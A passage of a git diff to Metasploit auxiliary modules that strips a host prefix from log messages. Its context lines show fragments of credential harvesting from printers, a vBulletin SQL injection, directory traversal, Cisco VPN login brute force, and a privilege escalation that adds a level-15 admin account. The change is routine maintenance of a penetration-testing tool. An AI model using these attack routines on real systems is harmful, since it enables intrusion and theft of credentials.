print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") connect send_header ack = recv_protocol_ack if ack.nil? - print_error("#{peer} - Failed to negotiate RMI protocol") + print_error("Failed to negotiate RMI protocol") disconnect return end - print_status("#{peer} - Listing names in the Registry...") + print_status("Listing names in the Registry...") begin names = send_registry_list rescue ::Rex::Proto::Rmi::Exception => e - print_error("#{peer} - List raised exception #{e.message}") + print_error("List raised exception #{e.message}") return end if names.nil? - print_error("#{peer} - Failed to list names") + print_error("Failed to list names") return end if names.empty? - print_error("#{peer} - Names not found in the Registry") + print_error("Names not found in the Registry") return end - print_good("#{peer} - #{names.length} names found in the Registry") + print_good("#{names.length} names found in the Registry") names.each do |name| begin remote_reference = send_registry_lookup(name: name) rescue ::Rex::Proto::Rmi::Exception => e - print_error("#{peer} - Lookup of #{name} raised exception #{e.message}") + print_error("Lookup of #{name} raised exception #{e.message}") next end if remote_reference.nil? - print_error("#{peer} - Failed to lookup #{name}") + print_error("Failed to lookup #{name}") next end - print_good("#{peer} - Name #{name} (#{remote_reference[:object]}) found on #{remote_reference[:address]}:#{remote_reference[:port]}") + print_good("Name #{name} (#{remote_reference[:object]}) found on #{remote_reference[:address]}:#{remote_reference[:port]}") report_service( :host => remote_reference[:address], :port => remote_reference[:port], diff --git a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb index 4f43207091..27092ab4f4 100644 --- a/modules/auxiliary/gather/konica_minolta_pwd_extract.rb +++ b/modules/auxiliary/gather/konica_minolta_pwd_extract.rb @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>' }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml0_body = ::Nokogiri::XML(response.body) @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionError - print_error("#{peer} - Version check Connection failed.") + print_error("Version check Connection failed.") end # This section logs on and retrieves AuthKey token @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => authreq_xml.to_xml }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml1_body = ::Nokogiri::XML(response.body) @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary extract(major, minor, authkey) end rescue ::Rex::ConnectionError - print_error("#{peer} - Login Connection failed.") + print_error("Login Connection failed.") end end @@ -185,7 +185,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => smbreq_xml.to_xml }, datastore['TIMEOUT'].to_i) if response.nil? - print_error("#{peer} - No reponse from device") + print_error("No reponse from device") return else xml2_body = ::Nokogiri::XML(response.body) diff --git a/modules/auxiliary/gather/memcached_extractor.rb b/modules/auxiliary/gather/memcached_extractor.rb index 2aa7fee13d..72df26dd36 100644 --- a/modules/auxiliary/gather/memcached_extractor.rb +++ b/modules/auxiliary/gather/memcached_extractor.rb @@ -111,11 +111,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) peer = "#{ip}:#{rport}" - vprint_status("#{peer} - Connecting to memcached server...") + vprint_status("Connecting to memcached server...") begin connect if (version = determine_version) - vprint_good("#{peer} - Connected to memcached version #{version}") + vprint_good("Connected to memcached version #{version}") unless localhost?(ip) report_service( host: ip, @@ -126,11 +126,11 @@ class Metasploit3 < Msf::Auxiliary ) end else - print_error("#{peer} - unable to determine memcached protocol version") + print_error("unable to determine memcached protocol version") return end keys = enumerate_keys - print_good("#{peer} - Found #{keys.size} keys") + print_good("Found #{keys.size} keys") return if keys.size == 0 data = data_for_keys(keys) @@ -144,10 +144,10 @@ class Metasploit3 < Msf::Auxiliary print_line("#{result_table}") unless localhost?(ip) path = store_loot('memcached.dump', 'text/plain', ip, data, 'memcached.txt', 'Memcached extractor') - print_good("#{peer} - memcached loot stored at #{path}") + print_good("memcached loot stored at #{path}") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout - vprint_error("#{peer} - Could not connect to memcached server!") + vprint_error("Could not connect to memcached server!") end end end diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f9e6328ab0..394b1facdf 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary # Check forum MyBB if res.body.match("MYBB") - print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") + print_good("MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Unknown @@ -77,13 +77,13 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Checking MyBB...") + print_status("Checking MyBB...") unless check == Exploit::CheckCode::Detected - print_error("#{peer} - MyBB not found") + print_error("MyBB not found") return end - print_status("#{peer} - Checking database...") + print_status("Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { @@ -94,17 +94,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("#{peer} - Timeout...") + print_error("Timeout...") return end # Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("#{peer} - Running PostgreSQL Database") + print_good("Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("#{peer} - Running SQLite Database") + print_good("Running SQLite Database") else - print_status("#{peer} - Running MySQL or unknown database") + print_status("Running MySQL or unknown database") end end end diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb index dbc12f74fc..d7de619453 100644 --- a/modules/auxiliary/gather/vbulletin_vote_sqli.rb +++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end @@ -77,11 +77,11 @@ class Metasploit3 < Msf::Auxiliary def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -173,21 +173,21 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i - print_good("#{peer} - #{count_users} users found. Collecting credentials...") + print_good("#{count_users} users found. Collecting credentials...") users_table = Rex::Ui::Text::Table.new( 'Header' => 'vBulletin Users', diff --git a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb index b06dd773c8..f3aed3ef04 100644 --- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb +++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting website export...") + print_status("Requesting website export...") res = send_request_cgi( { 'method' => 'POST', @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary print_status("it does not allow WRITE permission to the all-in-one-wp-migration/storage directory.") else store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup') - print_good("#{peer} - Backup archive saved to #{store_path}") + print_good("Backup archive saved to #{store_path}") end end end diff --git a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb index ebdc2ed1a7..d302309b70 100644 --- a/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb +++ b/modules/auxiliary/gather/wp_ultimate_csv_importer_user_extract.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary def process_row(row) if row[:user_login] && row[:user_pass] - print_good("#{peer} - Found credential: #{row[:user_login]}:#{row[:user_pass]}") + print_good("Found credential: #{row[:user_login]}:#{row[:user_pass]}") credential_data = { origin_type: :service, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Requesting CSV extract...") + print_status("Requesting CSV extract...") res = send_request_cgi( 'method' => 'POST', 'uri' => exporter_url, @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing response...") + print_status("Parsing response...") unless parse_csv(res.body, ',') unless parse_csv(res.body, ';') fail_with(Failure::UnexpectedReply, "#{peer} - Failed to parse response, the CSV was invalid") @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary end store_path = store_loot('wordpress.users.export', 'csv', datastore['RHOST'], res.body, 'users_export.csv', 'WordPress User Table Extract') - print_good("#{peer} - CSV saved to #{store_path}") + print_good("CSV saved to #{store_path}") end end diff --git a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb index 86fb68d333..bc8354c347 100644 --- a/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb +++ b/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb @@ -37,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to extract LDAP username and password...") + print_status("Attempting to extract LDAP username and password...") @auth_cookie = default_page if @auth_cookie.blank? - print_status("#{peer} - Unable to get authentication cookie from #{rhost}") + print_status("Unable to get authentication cookie from #{rhost}") return end @@ -56,10 +56,10 @@ class Metasploit3 < Msf::Auxiliary start_listener unless @data - print_error("#{peer} - Failed to start listiner or the printer did not send us the creds. :(") + print_error("Failed to start listiner or the printer did not send us the creds. :(") status = restore_ldap_server unless status - print_error("#{peer} - Failed to restore old LDAP server. Please manually restore") + print_error("Failed to restore old LDAP server. Please manually restore") end return end @@ -71,13 +71,13 @@ class Metasploit3 < Msf::Auxiliary ldap_creds = "#{ldap_binary_creds[0]}:#{ldap_binary_creds[1]}" # Woot we got creds so lets save them.# - print_good("#{peer} - The following creds were capured: #{ldap_creds}") + print_good("The following creds were capured: #{ldap_creds}") loot_name = 'ldap.cp.creds' loot_type = 'text/plain' loot_filename = 'ldap-creds.text' loot_desc = 'LDAP Pass-back Harvester' p = store_loot(loot_name, loot_type, datastore['RHOST'], @data, loot_filename, loot_desc) - print_status("#{peer} - Credentials saved in: #{p}") + print_status("Credentials saved in: #{p}") register_creds('ldap', rhost, @ldap_port, ldap_binary_creds[0], ldap_binary_creds[1]) end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary method = 'GET' res = make_request(page, method, '') if res.blank? || res.code != 200 - print_error("#{peer} - Failed to connect to #{rhost}. Please check the printers IP address.") + print_error("Failed to connect to #{rhost}. Please check the printers IP address.") return '' end res.get_cookies @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary res = make_request(login_page, method, login_post_data) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to login. Please check the password for the Administrator account") + print_error("Failed to login. Please check the password for the Administrator account") return nil end res.code @@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary ldap_port_number = ldap_port_settings.scan(/valPrt_1\[2\] = (\d+)/).flatten @ldap_server = "#{ldap_server_ip[0]}.#{ldap_server_ip[1]}.#{ldap_server_ip[2]}.#{ldap_server_ip[3]}" @ldap_port = ldap_port_number[0] - print_status("#{peer} - LDAP server: #{@ldap_server}") + print_status("LDAP server: #{@ldap_server}") unless res.code == 200 || res.blank? - print_error("#{peer} - Failed to get LDAP data.") + print_error("Failed to get LDAP data.") return nil end res.code @@ -149,10 +149,10 @@ class Metasploit3 < Msf::Auxiliary ldap_update_post *= '&' method = 'POST' - print_status("#{peer} - Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") + print_status("Updating LDAP server: #{datastore['NewLDAPServer']} and port: #{datastore['SRVPORT']}") res = make_request(ldap_update_page, method, ldap_update_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to update LDAP server. Please check the host: #{rhost}") + print_error("Failed to update LDAP server. Please check the host: #{rhost}") return nil end res.code @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary ldap_trigger_post *= '&' method = 'POST' - print_status("#{peer} - Triggering LDAP reqeust") + print_status("Triggering LDAP reqeust") res = make_request(ldap_trigger_page, method, ldap_trigger_post) res.code end @@ -243,10 +243,10 @@ class Metasploit3 < Msf::Auxiliary ldap_restore_post *= '&' method = 'POST' - print_status("#{peer} - Restoring LDAP server: #{@ldap_server}") + print_status("Restoring LDAP server: #{@ldap_server}") res = make_request(ldap_restore_page, method, ldap_restore_post) if res.blank? || res.code != 200 - print_error("#{peer} - Failed to restore LDAP server: #{@ldap_server}. Please fix manually") + print_error("Failed to restore LDAP server: #{@ldap_server}. Please fix manually") return nil end res.code @@ -265,7 +265,7 @@ class Metasploit3 < Msf::Auxiliary }, datastore['TIMEOUT'].to_i) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - print_error("#{peer} - Connection failed.") + print_error("Connection failed.") end res diff --git a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb index 9e36f7fd21..d7242a5e71 100644 --- a/modules/auxiliary/scanner/couchdb/couchdb_enum.rb +++ b/modules/auxiliary/scanner/couchdb/couchdb_enum.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary temp = JSON.parse(res.body) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Auxiliary 'CouchDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index 1dca83d949..0fc0fd14c0 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -32,14 +32,14 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Querying indices...") + vprint_status("Querying indices...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable - vprint_error("#{peer} - Unable to establish connection") + vprint_error("Unable to establish connection") return end @@ -47,11 +47,11 @@ class Metasploit3 < Msf::Auxiliary begin json_body = JSON.parse(res.body) rescue JSON::ParserError - vprint_error("#{peer} - Unable to parse JSON") + vprint_error("Unable to parse JSON") return end else - vprint_error("#{peer} - Timeout or unexpected response...") + vprint_error("Timeout or unexpected response...") return end @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary end if indices.length > 0 - print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}") + print_good("ElasticSearch Indices found: #{indices.join(", ")}") end end diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index 6f80a86707..82e6fbb881 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 and res.body =~ /Error report/ - vprint_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + vprint_error("Cannot obtain '#{fname}', here are some possible reasons:") vprint_error("\t1. File does not exist.") vprint_error("\t2. The server does not have any patches deployed.") vprint_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -88,11 +88,11 @@ class Metasploit3 < Msf::Auxiliary fname ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") elsif res and res.code == 404 and res.body.to_s =~ /The requested URL.*was not found/ - vprint_error("#{peer} - File not found. Check FILE.") + vprint_error("File not found. Check FILE.") else - vprint_error("#{peer} - Fail to obtain file for some unknown reason") + vprint_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 6c0b87c217..d7add8ec02 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -93,7 +93,7 @@ class Metasploit4 < Msf::Auxiliary res = req(datastore['CMD'], datastore['CVE']) if res && res.body =~ /#{marker}(.+)#{marker}/m - print_good("#{peer} - #{$1}") + print_good("#{$1}") report_vuln( :host => ip, :port => rport, diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 21e93ce9b1..dbaf72cd7e 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary fname = datastore['FILE'] fname = fname[1, fname.length] if fname =~ /^\// - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /failed to open stream\: No such file/ - print_error("#{peer} - Cannot read '#{fname}'. File does not exist.") + print_error("Cannot read '#{fname}'. File does not exist.") elsif res and res.code == 200 and res.body =~ /failed to open stream\: Permission denied/ - print_error("#{peer} - Cannot read '#{fname}'. Permission denied.") + print_error("Cannot read '#{fname}'. Permission denied.") elsif res and res.code == 200 and res.body =~ /Failed opening required/ - print_error("#{peer} - Cannot read '#{fname}'. Possibly not vulnerable.") + print_error("Cannot read '#{fname}'. Possibly not vulnerable.") elsif res and res.code == 200 data = res.body @@ -86,10 +86,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{datastore['FILE']} stored as '#{p}'") + print_good("#{datastore['FILE']} stored as '#{p}'") else - print_error("#{peer} - Request failed due to some unknown reason") + print_error("Request failed due to some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index f9c8611e68..0264d5b855 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -38,18 +38,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - print_error("#{peer} - Connection failed, Aborting...") + print_error("Connection failed, Aborting...") return end unless is_app_asdm? - print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.") + print_error("Application does not appear to be Cisco ASA ASDM. Module will not continue.") return end - print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.") + print_status("Application appears to be Cisco ASA ASDM. Module will continue.") - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/', 'method' => 'GET' }) - print_good("#{peer} - Server is responsive...") + print_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi({ 'uri' => '/+webvpn+/index.html', @@ -138,17 +138,17 @@ class Metasploit3 < Msf::Auxiliary res.body.match(/Success/) && res.body.match(/success/) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{peer} - HTTP Connection Failed, Aborting") + print_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 5ad7ed6458..0a1537b49f 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - vprint_error("#{peer} - Connection failed, Aborting...") + vprint_error("Connection failed, Aborting...") return false end unless is_app_ssl_vpn? - vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") + vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.") return false end - vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") + vprint_good("Application appears to be Cisco SSL VPN. Module will continue.") groups = Set.new if datastore['GROUP'].empty? - vprint_status("#{peer} - Attempt to Enumerate VPN Groups...") + vprint_status("Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups if groups.empty? - vprint_warning("#{peer} - Unable to enumerate groups") - vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup") + vprint_warning("Unable to enumerate groups") + vprint_warning("Using the default group: DefaultWEBVPNGroup") groups << "DefaultWEBVPNGroup" else - vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") + vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}") end else @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary end groups << "" - vprint_status("#{peer} - Starting login brute force...") + vprint_status("Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| do_login(user, pass, group) @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary def check_conn? begin res = send_request_cgi('uri' => '/', 'method' => 'GET') - vprint_good("#{peer} - Server is responsive...") + vprint_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, @@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass, group) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") begin cookie = "webvpn=; " + @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary resp.body.match(/SSL VPN Service/) && resp.body.match(/webvpn_logout/i) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") do_logout(resp.get_cookies) @@ -230,7 +230,7 @@ class Metasploit3 < Msf::Auxiliary return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") end rescue ::Rex::ConnectionRefused, @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index acb1737c39..513c8217b1 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) - vprint_good("#{peer} - Server is responsive") + vprint_good("Server is responsive") rescue ::Rex::ConnectionError, ::Errno::EPIPE return false end @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 - vprint_good("#{peer} - Logged out") + vprint_good("Logged out") end end @@ -117,8 +117,8 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('Cisco Adaptive Security Appliance Software Version') return resp.body else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == 2 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == 2 end end @@ -130,18 +130,18 @@ class Metasploit3 < Msf::Auxiliary password = Rex::Text.rand_text_alphanumeric(20) tries.times do |i| - vprint_good("#{peer} - Attemping to add User: #{username}, Pass: #{password}") + vprint_good("Attemping to add User: #{username}, Pass: #{password}") command = "username #{username} password #{password} privilege 15" resp = run_command(command, cookie) if resp && !resp.body.include?('Command authorization failed') && !resp.body.include?('Command failed') - vprint_good("#{peer} - Privilege Escalation Appeared Successful") + vprint_good("Privilege Escalation Appeared Successful") return [username, password] else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == tries - 1 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == tries - 1 end end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('SSL VPN Service') && resp.body.include?('webvpn_logout') - vprint_good("#{peer} - Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") + vprint_good("Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") return resp.get_cookies else return false @@ -195,7 +195,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) # Validate we're dealing with Cisco SSL VPN unless validate_cisco_ssl_vpn - vprint_error("#{peer} - Does not appear to be Cisco SSL VPN") + vprint_error("Does not appear to be Cisco SSL VPN") return end @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary # interimittent based on session, so we'll just retry # 'X' times. datastore['RETRIES'].times do |i| - vprint_good("#{peer} - Exploit Attempt ##{i}") + vprint_good("Exploit Attempt ##{i}") # Authenticate to SSL VPN and get session cookie cookie = do_login( @@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary # See if our authentication attempt failed unless cookie - vprint_error("#{peer} - Failed to login to Cisco SSL VPN") + vprint_error("Failed to login to Cisco SSL VPN") next end @@ -223,10 +223,10 @@ class Metasploit3 < Msf::Auxiliary if version && version_match = version.match(/Cisco Adaptive Security Appliance Software Version ([\d+\.\(\)]+)/) - print_good("#{peer} - Show version succeeded. Version is Cisco ASA #{version_match[1]}") + print_good("Show version succeeded. Version is Cisco ASA #{version_match[1]}") else do_logout(cookie) - vprint_error("#{peer} - Show version failed") + vprint_error("Show version failed") next end @@ -235,11 +235,11 @@ class Metasploit3 < Msf::Auxiliary do_logout(cookie) if creds - print_good("#{peer} - Successfully added level 15 account #{creds.join(", ")}") + print_good("Successfully added level 15 account #{creds.join(", ")}") user, pass = creds report_escalated_creds(user, pass) else - vprint_error("#{peer} - Failed to created user account on Cisco SSL VPN") + vprint_error("Failed to created user account on Cisco SSL VPN") end end end diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index a351f737aa..3878ced5cd 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] f = datastore['FILE'] @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:") + print_error("Unable to read '#{datastore['FILE']}', possibily because:") print_error("\t1. File does not exist.") 